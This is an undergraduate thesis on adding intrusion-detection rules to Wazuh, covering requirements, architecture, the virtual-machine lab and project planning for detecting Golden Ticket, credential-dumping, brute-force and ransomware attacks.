scieee AI-readable full text Open interactive document viewer

Improvements in IDS: adding functionality to Wazuh

Gómez Vidal, Andrés Santiago

Abstract

Cybersecurity nowadays is very complex: there are many sub-fi elds and expert tools and it could be argued that it is impossible to guarantee that any system is totally safe. In this project we put ourselves in the shoes of a system administrator for an enterprise, that wants to improve the security by detecting intrusions in the servers he works on. This is key to decide which technologies and tools we choose in this project.

Full text

UNIVERSITY OF SANTIAGO DE COMPOSTELA ESCOLA T´ ECNICA SUPERIOR DE ENXE ˜ NAR´ IA Improvements in IDS: adding functionality to Wazuh Author: Andr´es Santiago G´omez Vidal Directors: Purificaci´on Cari˜nena Amigo Andr´es Tarasc´o Acu˜na Computer Engineering Degree July 2019 Final degree project presented at the Escola T´ecnica Superior de Enxe˜nar´ıa of the University of Santiago de Compostela to obtain the Degree in Computer Engineering Ms. Purificaci´on Cari˜nena Amigo, Associate Professor Computing Science and Artificial Intelligence at the University of Santiago de Compostela and Mr. Andr´es Tarasc´o Acu˜na, Managing Director at Tarlogic Security S.L. STATE: That the present report entitled Improvements in IDS: adding functionality to Wazuh written by Andr´es Santiago G´omez Vidal in order to obtain the ECTS corresponding to the final degree project of the Computer Engineering degree was conducted under our direction in the department of Computer Science and Artificial Intelligence of the University of Santiago de Compostela. For the purpose to be duly recorded, this document was signed in Santiago de Compostela on July 24, 2019: The director, The codirector, The student, (Purificaci´on Cari˜nena Amigo) (Andr´es Tarasc´o Acu˜na) (Andr´es Santiago G´omez Vidal) i ii Index 1 Introduction 1 1.1 Motivation............................... 1 1.2 Objectives............................... 6 1.3 Structure of this document . . . . . . . . . . . . . . . . . . . . . . 7 2 Requirements 9 2.1 Limitations .............................. 9 2.2 Non-functional requirements . . . . . . . . . . . . . . . . . . . . . 10 2.2.1 Identification of non-functional requirements . . . . . . . . 11 2.2.2 Description of non-functional requirements . . . . . . . . . 11 3 Technologies and tools 17 3.1 OSSECandWazuh.......................... 17 3.1.1 Introduction.......................... 17 3.1.2 Wazuh architecture . . . . . . . . . . . . . . . . . . . . . . 19 3.1.3 Rules and decoders . . . . . . . . . . . . . . . . . . . . . . 21 3.2 Laboratory .............................. 25 3.2.1 Virtual machines . . . . . . . . . . . . . . . . . . . . . . . 26 3.3 Technologies and tools in detail . . . . . . . . . . . . . . . . . . . 28 3.3.1 For development and configuration . . . . . . . . . . . . . 28 3.3.2 Forpentesting......................... 28 3.3.3 For processing logs . . . . . . . . . . . . . . . . . . . . . . 29 3.3.4 For the documentation . . . . . . . . . . . . . . . . . . . . 29 4 Project management 31 4.1 Scopemanagement .......................... 31 4.1.1 Description of the scope . . . . . . . . . . . . . . . . . . . 31 4.1.2 Acceptation criteria . . . . . . . . . . . . . . . . . . . . . . 32 4.1.3 Methodology ......................... 32 4.1.4 Increments........................... 33 4.1.5 Products of the project . . . . . . . . . . . . . . . . . . . . 34 4.1.6 Exclusions........................... 34 4.1.7 Restrictions .......................... 36 iii 4.2 Riskmanagement........................... 37 4.2.1 Riskmetrics.......................... 37 4.2.2 Risk identification . . . . . . . . . . . . . . . . . . . . . . . 38 4.2.3 Risk analysis and planning . . . . . . . . . . . . . . . . . . 39 4.3 Timemanagement .......................... 51 4.3.1 WBS.............................. 51 4.3.2 Initial planning . . . . . . . . . . . . . . . . . . . . . . . . 54 4.3.3 Real development . . . . . . . . . . . . . . . . . . . . . . . 63 4.4 Configuration management . . . . . . . . . . . . . . . . . . . . . . 71 4.4.1 Configuration elements . . . . . . . . . . . . . . . . . . . . 71 4.5 Costmanagement........................... 72 4.5.1 Directcosts .......................... 72 4.5.2 Indirectcosts ......................... 75 4.5.3 Total costs of the project . . . . . . . . . . . . . . . . . . . 75 5 Increments 1 and 2 77 5.1 GoldenTicket............................. 77 5.1.1 Exploit methods . . . . . . . . . . . . . . . . . . . . . . . 80 5.1.2 Detection purely with signatures . . . . . . . . . . . . . . 87 5.1.3 Detection purely with Windows events . . . . . . . . . . . 88 5.1.4 Detection of Mimikatz . . . . . . . . . . . . . . . . . . . . 89 5.1.5 Detection of the use of the TGT with klist . . . . . . . . . 92 5.1.6 SilverTicket.......................... 96 5.1.7 Mitigation........................... 97 5.1.8 Conclusion........................... 99 5.2 More about the extraction of credentials . . . . . . . . . . . . . . 99 5.2.1 Exploit methods . . . . . . . . . . . . . . . . . . . . . . . 100 5.2.2 Detection of process accessing LSASS . . . . . . . . . . . . 108 5.2.3 Mitigation........................... 110 5.2.4 Conclusion........................... 111 5.3 More about PowerShell . . . . . . . . . . . . . . . . . . . . . . . . 111 5.3.1 Encoding commands . . . . . . . . . . . . . . . . . . . . . 112 5.3.2 PowerShell version 5 security features . . . . . . . . . . . . 114 5.3.3 PowerShell without powershell.exe . . . . . . . . . . . . . . 115 5.3.4 Conclusion........................... 118 5.4 Detection of suspicious logins . . . . . . . . . . . . . . . . . . . . 118 5.4.1 Reverse brute force login attempts . . . . . . . . . . . . . 118 5.4.2 Distributed brute force login attempts . . . . . . . . . . . 119 5.4.3 Login outside of usual hours . . . . . . . . . . . . . . . . . 120 5.4.4 Conclusion........................... 121 iv 6 Increment 3 123 6.1 The basics of ransomware . . . . . . . . . . . . . . . . . . . . . . 123 6.1.1 State of ransomware . . . . . . . . . . . . . . . . . . . . . 125 6.2 Common patterns in crypto ransomware . . . . . . . . . . . . . . 130 6.2.1 File encryption example . . . . . . . . . . . . . . . . . . . 131 6.2.2 Detection of crypto ransomware . . . . . . . . . . . . . . . 133 6.2.3 Backup deletion . . . . . . . . . . . . . . . . . . . . . . . . 143 6.3 Active response against crypto ransomware . . . . . . . . . . . . . 145 6.4 Testing with real crypto ransomware . . . . . . . . . . . . . . . . 146 6.5 Mitigation............................... 150 6.6 Conclusion............................... 152 7 Conclusions and additions 153 7.1 Conclusion............................... 153 7.2 Additions ............................... 154 A Glossary 155 B User Manual 159 C Programming and configuration code 165 v vi List of Figures 1.1 Comparison by attributes of the most important ICSs[7] . . . . . 5 3.1 The different parts of Wazuh[12] . . . . . . . . . . . . . . . . . . . 17 3.2 Single host architecture . . . . . . . . . . . . . . . . . . . . . . . . 20 3.3 Distributed architecture . . . . . . . . . . . . . . . . . . . . . . . 20 3.4 Communications and data flow . . . . . . . . . . . . . . . . . . . 21 3.5 Event Flow Diagram[2] . . . . . . . . . . . . . . . . . . . . . . . . 22 3.6 Portion of the ruleset used by Wazuh[18] . . . . . . . . . . . . . . 24 3.7 Example of output for ossec-logtest . . . . . . . . . . . . . . . . . 25 3.8 Virtual machines in the project . . . . . . . . . . . . . . . . . . . 27 4.1 Planning simplification . . . . . . . . . . . . . . . . . . . . . . . . 55 4.2 Planning of the beginning of the project . . . . . . . . . . . . . . 56 4.3 Planning of the increment 1: Common attacks in Windows Server 57 4.4 Planning of the increment 2: Use of more data sources ...... 58 4.5 Planning of the increment 3: Detection/action against ransomware 59 4.6 Planning of the increment 4: Adapt Wazuh configuration to typical requirements from enterprises .................... 60 4.7 Planning of the increment 5: Explore solutions in problems with GPDR ................................. 61 4.8 Planning of the increment 6: Additional detection for GNU/Linux 62 4.9 Planning of the increment 7: VirusTotal integration ........ 63 4.10 Planning simplification . . . . . . . . . . . . . . . . . . . . . . . . 66 4.11 Planning of the beginning of the project . . . . . . . . . . . . . . 67 4.12 Planning of updating the tools of the project . . . . . . . . . . . . 68 4.14 Planning of the increment 3: Detection/action against ransomware 69 4.13 Planning of the increments 1 and 2 . . . . . . . . . . . . . . . . . 70 4.15 Planning of the closing of the project . . . . . . . . . . . . . . . . 71 4.16 Formula to calculate the cost of hardware items . . . . . . . . . . 74 5.1 Steps for Kerberos authentication . . . . . . . . . . . . . . . . . . 78 5.2 Meterpreter shell running . . . . . . . . . . . . . . . . . . . . . . 85 5.3 Migration to a PowerShell session as AD administrator . . . . . . 85 vii 4CHAPTER 1. INTRODUCTION OSSEC stands for Open Source HIDS SECurity and is interesting for this project because[3][4]: •Widely Used: OSSEC is a growing project, used by many different entities (ISPs, universities, governments, large corporate data centers) as their main HIDS solution. In addition to being deployed as an HIDS, it is commonly used strictly as a log analysis tool, monitoring and analyzing firewalls, IDSs, web servers and authentication logs. •Scalable: Because it is an HIDS and it uses agents. Each monitored host can either install the agent or use an agentless agent[5][6]. Agentless agents are processes initiated from the OSSEC manager, which gather information from remote systems, and use any RPC method (e.g. SSH, SNMP, RDP, WMI). •Multi-platform: GNU/Linux, Windows, Mac OS and Solaris. This is important because most professional services are on GNU/Linux or Windows, but it is important to note that some rules can only work for certain versions of operating systems. •Free: OSSEC is a free software and will remain so in the future; you can redistribute it and/or modify it under the terms of the GNU General Public License (version 2) as published by the FSF – Free Software Foundation. •Open source: The code is open, so you can read, contribute and debug it all you want. •Rootkits detection: This type of malware usually replaces or changes existing operating system components in order to alter the behaviour of the system. Rootkits can hide other processes, files or network connections like itself. •File integrity monitoring: To detect access or changes to sensitive data. There are lots of alternatives to OSSEC for the scenario of a system administrator that wants to reinforce the security of the systems he is responsible for. There exist free of charge and paid solutions. Not all are pure IDSs and often they specialize in a field. For example the next table shows a comparison of the most important ICSs (Industrial Control Systems), which is a genetic type of control system that includes IDS, therefore it shows a comparison of OSSEC with similar software: 1.1. MOTIVATION 5 Figure 1.1: Comparison by attributes of the most important ICSs[7] One of the problems of a comparison in a table like this is that it fails to show how much a tool excels or lacks in the features it shares with others, how easy it is to use and other factors that can help to choose the right tool. The most relevant alternative technologies to OSSEC for this project are[8]: •Sagan: An open source HIDS, but it only supports *nix operating systems (Linux, FreeBSD, OpenBSD, etc) and it lacks in features compared to OSSEC. •YARA: It is not an IDS or IPS, it is just a tool that does pattern/string/signature matching, but it excels at it in performance, results and easiness to 6CHAPTER 1. INTRODUCTION write the rules. It can be used to scan the memory for known patterns. YARA is being used widely in cybersecurity, for example by Avast, Kaspersky Lab, VirusTotal and McAfee Advanced Threat Defense[9]. We could build a system to use YARA to scan files but always combined with at least another tool, but we prefer to stick to a tested IDS. Due to their popularity it is worth mentioning the next tools, even though they are only for network: •Bro: It is an open source IDS and supports only Linux, FreeBSD, and Mac OS. •Snort: It is the most popular open source IDS/IPS, but can be expensive in processing power. •Suricata: Another open source IDS/IPS solution. It provides hardware acceleration and multi-threading to improve the scanning speed. Most of the attributes in the previous comparison are not relevant for our work. We chose OSSEC because of the problems found on the alternatives. Also OSSEC offers a reliable way to use an already developed and thoroughly tested IDS, which we can enhance to our needs without much work. To even ease more this we will use Wazuh, a fork of OSSEC. 1.2 Objectives Quality is valued more than quantity in this project. Therefore anything will be reworked or discarded if it does not fully satisfy the student or the directors. The main objective is to improve intrusion detection in IDS. This can be accomplished in several ways adding or changing functionality of an already existing technology. •Coding on core or additions. •Configuration or input of the program. In this project the focus is on the configuration, particularly of rules to detect certain attacks. The idea is adding functionality to Wazuh by setting certain configuration (including scripts and third-party programs) that allows us to deploy new or different detection mechanisms. 1.3. STRUCTURE OF THIS DOCUMENT 7 It is necessary to fully understand the attacks first to code their detection, therefore preparing the attacks also will need a fair amount of time. It is important to explain the attacks and their detection clearly, in order to make this work useful for anyone else and ease any possible changes in the future. The work done in this project improves the detection capabilities in cybersecurity in the SIEM Wazuh. This allows small, medium and big enterprises to increase their level of security control on cyberattacks on their network. 1.3 Structure of this document This document has 7 chapters: •In chapter 1 the project is introduced, explaining its motivation and objectives. Some key concepts are also explained in this chapter. •Chapter 2 explains the requirements and limitations of the project. •In chapter 3 there is a detailed explanation of the technologies and tools used in the project, expanding on the concepts from the first chapter. •In chapter 4 there is the management of the project, including: scope, risk, configuration, cost and time management. •In chapter 5 the process of the increments 1 and 2 is detailed. This chapter satisfies multiple essential requirements. •In chapter 6 the process of the increment 3 is detailed. This chapter satisfies multiple essential requirements. •Chapter 7 describes the conclusions of the project and different ways to continue its work. As additions there are several appendixes: •Glossary: It serves as a list of terms that are relevant for the domain of this project, including acronyms. •User manual: Used to explain the details that are only needed for those who want to use the system. •Programming and configuration code: In order to explain the details of certain key parts of the project that are deeply related to configuration or scripts. 8CHAPTER 1. INTRODUCTION Chapter 2 Requirements The requirement specification is a full description of the software the project is to develop. PMBOK[10] states that requirements are conditions or capabilities that a product must meet to satisfy the contract. The requirements expose the needs of the client, which have to be accomplished to finish the project successfully. The client of the project is Tarlogic. Depending of their type they can describe features, data, relations, properties or any details necessary to explain the system without ambiguity, in a way it can be easily understood. 2.1 Limitations This project is not about software development, it is about cybersecurity research and auditing. Even though there is some basic creation of rules and scripts they can not be seriously considered as software development. All these cases are very straightforward and they have one or two actors at most. Most of them are so simple that there are basically no other ways to write them. In this project there are no tests in the way a traditional project for software development would have. The closest thing are the Wazuh rules, being their trigger considered a success and either the opposite or any false positives considered a failure. The requirement specification is simplified: •Use cases: A use case is a description of all the ways an end-user wants to use a system. These uses are like requests of the system, and use cases describe what that system does in response to such requests. In other words, use cases describe the conversation between a system and its user(s), known 9 10 CHAPTER 2. REQUIREMENTS as actors. Although the system is usually automated (such as an Order system), use cases also apply to equipment, devices, or business processes[11]. It does not make sense to have them for this project because the software is too straightforward to have different ways to be used. •Actors: There is no need due to the software being just an one way automated interaction. •Functional requirements: They describe the specifics about the functionality the system needs to have. There could be functional requirements, but in most cases they would be almost the same as the rules or scripts they try to describe, making them pointless. •Traceability matrix: Shows the relationship between use cases and functional requirements, therefore if there are none of either type there is no meaning to having this matrix. •Non-functional requirements: They describe requirements that the system needs, but that are not functional requirements. They can help in this project precisely because it is not about functionality development. These are the requirements this project has. 2.2 Non-functional requirements There was a meeting with Tarlogic before the beginning of the project were the requirements were set. The requirements were classified by priority into these categories: •Essential: Those that are mandatory for the project to be considered successful. •Desired: They would be completed if there are enough resources. •Optional: A level of priority under desired, meaning that they would be worked on after them. Later the student grouped them into increments, some of which are essential. These requirements could be expanded and more could be added during the project if it were to be needed, which did not happen. 2.2. NON-FUNCTIONAL REQUIREMENTS 11 2.2.1 Identification of non-functional requirements Identifier Name RNF-01 Detection of the Golden Ticket attack RNF-02 Detection of memory dumps for lsass.exe RNF-03 Detection of distributed brute force login attempts RNF-04 Detection of reverse brute force login attempts RNF-05 Detection of login outside of usual hours RNF-06 Monitoring of trap files in a file server RNF-07 Detection of backdoors RNF-08 Use Sysmon to gather system’s data in real time RNF-09 Detection of cryptolocker RNF-10 Configuration profiles RNF-11 Use of honeypots with Wazuh RNF-12 Explore solutions with GPDR RNF-13 Modification of key files in Linux RNF-14 Integration of Wazuh with other programs Table 2.1: List of the non-functional requirements of the project 2.2.2 Description of non-functional requirements Identifier RNF-01 Name Detection of the Golden Ticket attack Description Study of the Golden Ticket attack in Windows. Coding of different ways to do the attack and close examination of the data received by Wazuh. Research about ways to identify the attack and each of its forms. Coding and testing of detection techniques. Priority Essential Validation Every variant of the Golden Ticket attack in the project is identified as such by a rule Identifier RNF-02 Name Detection of memory dumps for lsass.exe Description Study of the different ways to extract credentials related to this process. Coding of different approaches to reproduce it and comparison of the received events. Find ways to assure their detection with Wazuh and test them properly. Priority Essential Validation All the examples presented of ways to dump the memory of lsass.exe get detected with at least one of the methods 12 CHAPTER 2. REQUIREMENTS Identifier RNF-03 Name Detection of distributed brute force login attempts Description The idea is to identify from Windows security events when a network is being attacked through login attempts, but changing his IP every few seconds (to avoid being banned). For example an alert would trigger with at least 5 attempts in 5 minutes, 20 attempts in 30 minutes or 200 attempts in 180 minutes. Priority Essential Validation Every one of the scripts for this attack are detected, triggering alerts. Identifier RNF-04 Name Detection of reverse brute force login attempts Description Multiple login attempts are made from the same IP to different accounts. For example it would be noticed with at least 3 attempts in 10 seconds, 12 attempts in 1 minute or 120 attempts in 1 hour. The data source for Wazuh would be Windows security events. Priority Essential Validation Any of the scripts used to reproduce the attack trigger an alert. Identifier RNF-05 Name Detection of login outside of usual hours Description The first step would be to specify the Organizational Units and their logon time ranges. Then set rules in Wazuh to guarantee any logging outside of them would trigger an alert and personal messages to the person in charge of the unit, or any other required action. This and the previous requirements are part of the first increment. Priority Essential Validation Any logins or failures outside the allowed hours trigger alerts, sending a message to the Organizational Unit coordinator 2.2. NON-FUNCTIONAL REQUIREMENTS 13 Identifier RNF-06 Name Monitoring of trap files in a file server Description Certain files are monitored in a Windows file server, for example in a hidden folder, in an attempt to detect attackers interested in them. This is a honeypot like method but only with files. This could fit in several increments as a bonus to improve other requirements. Priority Desired Validation The attempts to access the files are detected, triggering alerts Identifier RNF-07 Name Detection of backdoors Description A backdoor is a change or a program in the system to allow easy access to an attacker. The fist step would be to research about techniques to set backdoors in Windows Server and how to detect them. Later a testing stage has to assure they are actually noticed by our rules in Wazuh. This could turn to be a very big and time consuming requirement to implement, therefore it is not essential. It is very related to the attacks in the first increment, so it makes sense for it to be there too. Priority Desired Validation The studied exploits for setting backdoors are detected and stopped (if possible) by Wazuh Identifier RNF-08 Name Use Sysmon to gather system’s data in real time Description A brief research on Sysmon would be followed by its implementation and testing. This is the most part of the increment two. Priority Essential Validation Sysmon events are created when expected and they reach Wazuh in a reliable manner 20 CHAPTER 3. TECHNOLOGIES AND TOOLS There are two possible architectures for this setup: having the ELK stack in the same machine as the Wazuh server (single host) or in a separated one (distributed). Each has advantages and disadvantages and in this project we will use the single host because in our case there are no constraints and it is easier to set up and more efficient. Figure 3.2: Single host architecture Figure 3.3: Distributed architecture To understand better the communications and data flow in Wazuh we will now get into more detail on the process[16][17]. Wazuh agents use the OSSEC message protocol to send collected events to the Wazuh server over port 1514 (UDP or TCP). The Wazuh server then decodes and rule-checks the received events with the analysis engine. Events that trip a 3.1. OSSEC AND WAZUH 21 rule are augmented with alert data such as rule ID and rule name. The Wazuh message protocol uses a 192-bit Blowfish encryption with a full 16-round implementation, or AES encryption with 128 bits per block and 256-bit keys. Logstash formats the incoming data and optionally enriches it with GeoIP information before sending it to Elasticsearch (port 9200/TCP). Once the data is indexed into Elasticsearch, Kibana (port 5601/TCP) is used to mine and visualize the information. The Wazuh App runs inside Kibana constantly querying the RESTful API (port 55000/TCP on the Wazuh manager) in order to display configuration and status related information of the server and agents, as well to restart agents when desired. This communication is encrypted with TLS and authenticated with username and password. Figure 3.4: Communications and data flow Both alerts and non-alert events are stored in files on the Wazuh server in addition to being sent to Elasticsearch. These files can be written in JSON format and/or in plain text format (.log, with no decoded fields but more compact). These files are daily compressed and signed using MD5 and SHA1 checksums. There is also the option to store the alerts in a database if OSSEC is compiled with database support (for example MySQL or PostgreSQL)[2]. 3.1.3 Rules and decoders They constitute the main part of this project and they can be used to detect application or system errors, misconfigurations, attempted and/or successful malicious activities, policy violations and a variety of other security and operational issues[13]. Wazuh is quite helpful with the features and documentation of the ruleset and in this project the already existing rules and decoders were a great 22 CHAPTER 3. TECHNOLOGIES AND TOOLS help as examples. From the previous figure, the elements immediately related to the ruleset are: When an event is received in the manager first it gets decoded. The process of predecoding is very simple and is meant to extract only static information from well-known fields of an event. Decoding is used for extracting the data that is not static, making it easier to create rules for it. Figure 3.5: Event Flow Diagram[2] At least a rule in the hierarchy has to be related to the decoder of the event for it to be able to trigger an alert. An alert is generated if the conditions of the rule are true. 3.1. OSSEC AND WAZUH 23 When alerts are triggered they are recorded into the log, and also can be stored in a database, send e-mails and execute commands[2]. There are two types of rules[2]: •Atomic: They are based on simple events, without any correlation. They are by far the most used. •Composite: Those with multiple events. They have a time window and a number of times the rule has to be true before triggering the alert. They can group multiple atomic rules, all of which have to be true for the composite rule to be true. The level parameter of the rule marks the severity of the alert. These are some examples[2]: •0: Ignored, no action taken. Primarily used to avoid false positives. These rules are scanned before all the others and include events with no security relevance. •1: They are like 0, but for composite rules. Atomic rules for composite rules need to be of level 1 to be used by composite rules and not generate any alert on their own. •2: System low priority notifications or status messages that have no security relevance. •3: Successful/authorized events. Successful login attempts, firewall allow events, etc. •4: System low priority errors. Errors related to bad configurations or unused devices/applications. •5: User-generated errors. Missed passwords, denied actions, etc. These messages typically have no security relevance. •6: Low relevance attacks. Indicate a worm or a virus that provide no threat to the system such as a Windows worm attacking a Linux server. They also include frequently triggered IDS events and common error events. In this project the same level is used for all the rules that are meant to trigger alerts, to keep it simple. 24 CHAPTER 3. TECHNOLOGIES AND TOOLS Rules can be added in /var/ossec/etc/rules/ and decoders in /var/ossec/etc/decoders/ without any issue, but to change the already existing ones in /var/ossec/ruleset/rules/ or /var/ossec/ruleset/decoders/ is a bad idea because the next changes in those files from updates would overwrite them. As mentioned before Wazuh adds its own ruleset over the one provided by the OSSEC project. The next table shows about 20% of the combined ruleset that Wazuh uses, where Out of the box means that the source was the OSSEC project. Figure 3.6: Portion of the ruleset used by Wazuh[18] Wazuh provides a way to manually test how an event is decoded and if an alert is generated with the tool /var/ossec/bin/ossec-logtest[19], which is very useful for debugging. To use it you only need to introduce the data as it would be received by the Wazuh manager. It is possible to show which rules are tried and which trigger an alert for each event. This tools does not need a restart of the wazuh-manager service whenever changes want to be tested because it reads the configuration directly. But is also worth to mention that some times it can be misleading because it does not work in the same way as the manager. For example the logtest may show that the log matches a certain rule but actually it has matched a previous one silently. For example for this input: 3.2. LABORATORY 25 We get the next output: Figure 3.7: Example of output for ossec-logtest This example shows how Wazuh processes the input text, that usually would be in a SSH event. The decoder sshd matches the format of the input text, and that it is able to extract the dstuser and srcip fields. Then the event is processed by the set of rules until it matches the conditions of the rule 5715, which should generate an alert. After version 3.0.0 (we are currently in 3.9) Wazuh incorporates an integrated decoder for JSON logs enabling the extraction of data from any source in this format. This can be very useful in many situations, for example trivializing the generation of alerts for programs reporting in JSON, without the need for a decoder for each one[20]. Another interesting feature is to check if a field extracted during the decoding phase is in a CDB list (constant database). The main use case of this feature is to create a white/black list of users, IPs or domain names.[21]. 3.2 Laboratory This project was run under a GNU/Linux distribution in one of the personal computers of the student. Said computer has 20GB of RAM, an i5-2500k processor and about 500GB of free disk storage for this project (of which 100GB were of Solid State Disk). Hosting services were considered but discarded, because their biggest advantage would be to be able to work on this project anywhere (since the only user is the 26 CHAPTER 3. TECHNOLOGIES AND TOOLS student). This is something that can be achieved in a home computer with port redirection and either knowing the external IP of the router or using a naming service, but in this case there was no need to connect from the outside. 3.2.1 Virtual machines VirtualBox was chosen as the host program of the virtual machines because it was the one the student had the most experience with. This laboratory consist of multiple virtual machines, that represent: •An enterprise domain of Windows computers, named Wazuh.local, managed by Windows’ Active Directory: –Windows Server 2019, as Domain Controller of the Active Directory. –Windows Server 2019, as a SMB file server. –Windows 10, as a basic workstation. •The Wazuh server: A CentOS 7. As mentioned before in 3.1.2, we are using a single server to host both the Wazuh manager and the ELK stack. •An offensive security box: In this case with Kali Linux. This is used to access the Windows boxes in some of the attacks. 3.2. LABORATORY 27 Figure 3.8: Virtual machines in the project Every machine has two network interfaces, one for the internal network (10.0.3.0) and another for accessing the internet connection of the host. Each of the Windows boxes have a Wazuh agent installed, that reports to their manager (server) in the CentOS box. All the ruleset changes and log processing was done directly on the CentOS machine. Most of the time only the DC and the CentOS machine were powered on, but when all of them were being used at the same time they consumed about 12GB of RAM. Leaving aside booting, they did not affect performance in a perceptible way, either one to each other or to the host. Snapshots were taken when significant changes were made, like relevant installation or configuration. Then the virtual machines with their snapshots were copied to a couple of external disks as backup. At the end of the project near 60 snapshots were taken and the virtual machines with their snapshots were using about 160GB of disk space. 28 CHAPTER 3. TECHNOLOGIES AND TOOLS 3.3 Technologies and tools in detail This section groups and explains the main software used in the project for an easier overview. 3.3.1 For development and configuration •Wazuh: Wazuh[22] is the core of this project and some of the configuration of the system had to be done with it. In this project ruleset files were created to detect the targeted threats. •Sysmon: Sysmon[23] reports events based on its configuration, which in most cases give more insight of the status of the system than normal Windows events. •PowerShell: Some basic scripting[24] was done in PowerShell to mimic attacks and to perform a particular detection with a remote command. 3.3.2 For pentesting •PowerShell scripts: Third-party tools written in PowerShell were used to mimic attacks. •PowerShell and Windows built-ins: Some harmless PowerShell commands were used in combination with Windows built-ins in order to extract useful data for an attacker. •Linux shell programs in GNU/Linux: They were used in order to fully understand how some of the security was implemented in the Windows systems. For example their network share was first tested with the Samba command smbclient. •Metasploit: It was used as framework[25] for getting information and to exploit security vulnerabilities, mimicking an attacker. •Mimikatz: Mimikatz[26] was one of the most used tools for extracting data and gaining privileges. •Other third-party tools were used to dump data from memory or extract credentials. They were only used in order to gather enough data to assure the identification of attack patterns from different sources. •OpenSSL[27]: Set of tools for secure communications. In this project it was used to encrypt files for crypto ransomware testing. •Trid[28]: It is a tool for scanning files in order to find their type. 3.3. TECHNOLOGIES AND TOOLS IN DETAIL 29 •Dharma[29]: It is a crypto ransomware malware that was executed in order to test the configuration against a real software. 3.3.3 For processing logs •The Kibana plugin for Wazuh: It provides an easy and fashionable way to show the triggered alerts with a web browser. It was only used at first, before it felt too slow and shallow. •Linux shell programs in GNU/Linux: The most used were Grep, AWK and Tmux. They were used to process the logs of Wazuh for most of the project. These logs include the received events and the triggered alerts. They were a good fit because they are easy to write commands on, they are fast and the queries needed for this project were quite simple. Grep was used for finding events with certain patterns. AWK to parse logs for easier comprehension. Tmux is a terminal multiplexer, which is basically a program that controls a bunch of terminals, and was used to manage the shells and to find and copy strings in them, similar to an Integrated Development Environment (IDE). •The Windows Event Viewer: To troubleshoot inspecting the logs generated from Sysmon. Some times under heavy load (particularly after booting) the agent could not send the data to the manager without a significant delay of a couple of minutes. 3.3.4 For the documentation •Git: It was used to store the memory and manage its changes, through a Github repository[24]. •Vim + L A T EX+ Latexmk: Vim was used as the text editor to write all the documentation and most of the ruleset and scripts. This was easier for me than using other editors because I have a fair amount of customization for Vim, in my general purpose dotfiles[30]. L A T EXwas the medium the memory was written in (including the WBS and Gantt diagrams), with Latexmk for its compilation. •Draw.io: A web application for general purpose drawing[31]. It was used for making diagrams in this project. •Simplescreenrecorder: It is a GNU/Linux program. It was used to record videos during critical tasks using the virtual machines. These serve just as a way to assure the student these tasks were done exactly as he remembers them, or how to reproduce them. They did not take much disk space (about 36 CHAPTER 4. PROJECT MANAGEMENT allow to monitor it with Wazuh. Sysmon also has events for the registry changes: creation, deletion, renaming and value modification. Because of the lack of time and experience this idea was left behind for most of the project, leaving aside a minor part in the third increment. YARA is very interesting for this kind of project, because it provides the ability to scan the memory for signatures. The problem for using it with Wazuh currently is that it belongs to the Virustotal pack of malware detection tools, so it could be used with Wazuh with a Virustotal API key, but the free version of the API key only allows a few queries (the option of getting a premium key was not considered). There has been for months an open issue in the Github page of Wazuh for integrating it with YARA (as other IDSs have done before). This integration would allow unlimited use of YARA scans. The issue has recently evolved to an issue to integrate YARA into Wazuh as a module[39]. Unfortunately this was not done before the first increment of the project was completed, so there was no chance to use it in the project. Sigma[40] is a project that maintains a Generic Signature Format for SIEM Systems. This means a set of files describing threats and relevant information about them, like signatures and false positives. An automated integration with Sigma would also be possible with a script to convert Sigma rules to OSSEC, which was not even considered because it falls out the scope. It could be been used in some parts of this project as a manual resource to find patterns to look for, but in the end was not necessary. Another idea that was left behind was to assure the protection of the Wazuh agent itself in case of attack. This would cover the detection of processes attempting to stop or modify the agent program or the data sent to the manager. This can also be applied to other actions like disabling logs and modifying settings or security policies. It is interesting for the project because it would be one of the first and most effective steps that a smart attacker would do to avoid being detected. This issue was raised in the initial meeting with Tarlogic but was not considered a priority, therefore it was not included in the requirements. 4.1.7 Restrictions Leaving aside the time constraint of ∼400 hours, the two main factors to decide what improvements to choose for this project are a student without experience in professional cybersecurity and that we want some kind of immediate results from this project. This is why instead of a pure research project (for example machine learning with IDS), we opted for a more traditional and safer approach. Because of this most of the increments were optional (due to the high probability 4.2. RISK MANAGEMENT 37 of initial scope being too ambitious), but the first increments are considered vital to the project. A minor restriction is to deliver correctly all the products of the project before the presentation date. 4.2 Risk management Risk management can be summarized as a group of processes whose objective is to avoid undesirable or unexpected situations for the duration of the project. The management of the risks of the project has the next steps: •Risk metrics: A short clarification of how to estimate the probability, impact and exposition of risks. •Risk identification: Analysis to identify the risks that can affect the project. This was performed by brainstorming and reviewing the list of identified risks. •Risk analysis and planning: All the risks are analyzed, setting their properties (probability, impact, indicator, etc). Also prevention and/or correction measures for each risk are planned in case they take place. Prevention measures are optional and deployed before the risk happens, while correction measures are mandatory and used after a risk triggers. There are three types of measures: –Avoid: They attempt to negate the occurrence or progression of the risk. It only makes sense for them to be in prevention. –Mitigation: The impact is reduced. They can be for either prevention or correction. In the case of correction they are known as contingency too. –Transference: Another entity takes care of the problem. In this project this almost never applies because there are no third-party involved to rely responsibility on, except in very specific cases. 4.2.1 Risk metrics The values of probability and impact are estimations made by the student, based on his current experience (without any further study or references). To ease their management they are classified into Low, Medium or High, depending on their values as the next two tables show: 38 CHAPTER 4. PROJECT MANAGEMENT Chances of the risk happening Probability ≥80% High Between 30% and 80% Medium ≤30% Low Table 4.1: Probability classification of risks Resource in Place / Effort / Cost Impact ≥20% High Between 10% and 20% Medium ≤10% Low Table 4.2: Impact classification of risks The calculation of the exposition is provided by the next table, based on the values of probability and impact: Exposition Probability High Medium Low Impact High High High Medium Medium High Medium Low Low Medium Low Low Table 4.3: Method of calculation of exposition based on probability and impact 4.2.2 Risk identification The next table shows the list of identified risks of the project. 4.2. RISK MANAGEMENT 39 Identifier Name R-01 Optimistic planning, “best case”, instead of a realistic “expected case” R-02 Bad requirement specification R-03 Design errors R-04 Lack of key information from sources R-05 Lack of feedback or support from the security consultants from Tarlogic R-06 The learning curve of some technologies is larger than expected R-07 The uncertain parts of the project take more time than expected R-08 Source material is not available R-09 Unexpected changes to any of the software used in the project R-10 Loss of work R-11 Wrong management of the project’s configuration R-12 A delay in one task leads to cascading delays in the dependent tasks R-13 The student can not find a way to code the detection of a certain occurrence R-14 The quality of the product is not enough R-15 Sickness or overwork R-16 Performance issues R-17 Unnecessary work R-18 Optional requirements delay the project R-19 Unexpected personal events delay the project Table 4.4: List of the risks of the project 4.2.3 Risk analysis and planning An analysis on the risks previously identified was made. The next tables list the risks with their basic data, estimations, contingency and prevention measures when possible. 40 